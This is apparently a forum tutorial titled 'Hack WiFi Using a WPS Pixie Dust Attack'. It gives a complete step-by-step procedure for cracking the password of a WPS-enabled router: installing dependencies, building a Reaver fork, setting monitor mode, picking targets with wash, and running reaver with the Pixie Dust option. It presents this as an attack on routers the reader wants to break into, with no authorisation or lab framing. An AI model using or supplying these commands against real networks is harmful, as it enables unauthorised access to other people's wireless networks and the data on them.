Hack WiFi Using a WPS Pixie Dust Attack

Long time reader, first time 'How To' poster. This tutorial has been highly requested. Here are the steps to perform a Pixie Dust attack to crack a WiFi password that has WPS enabled.
Please note, this attack is very specific in nature. I've had a lot of success running this attack against Ralink and RealTek chipsets. And very spotty success against Broadcom chipsets. This might not work against all routers, but is definitely worth trying before using a brute force attack against WPS
Let's Begin!!!

Step 1Download All Dependencies

It's important to download all dependencies from the repository before proceeding with the attack. Kali Linux includes some of these, but if you're using another flavor of Linux, it may not. So let's go through all of them.
  1. First, type into the terminal: apt-get update
  2. Then: apt-get install build-essential
  3. apt-get install libpcap-dev
  4. apt-get install sqlite3
  5. apt-get install libsqlite3-dev
  6. apt-get install pixiewps
I like to do each download individually as I've had issues in the past trying to download all at once.

Step 2Clone the GitHub

This attack works by using a fork of Reaver. We'll need to download, compile, and install the fork. Let's begin:
git clone https://github.com/t6x/reaver-wps-fork-t6x

Step 3Installation

From your pwd, type...
  1. cd reaver-wps-fork-t6x/
  2. cd src/
  3. ./configure
  4. make
  5. make install
or 'sudo make install' if you're not logged in as 'root'

Step 4Monitor Mode

Put your interface into monitor mode using 'airmon-ng start {wireless interface}

Step 5Find a Target

The easiest way to find a target with WPS enabled is
'wash -i {monitor-interface}'
Gather the BSSID and channel # for the router you want to attack. Make sure you have a strong signal before attempting this attack.

Step 6Launch the Attack

Once you have all the information, simply type in the following command:
reaver -i {monitor interface} -b {BSSID of router} -c {router channel} -vvv -K 1 -f

Step 7Ta-Da!

There's the password! Again, this attack won't work against all routers, but it is definitely more effective than a brute force attack (Pixie Dust: maximum 30 minutes vs Brute Force: minutes to DAYS!)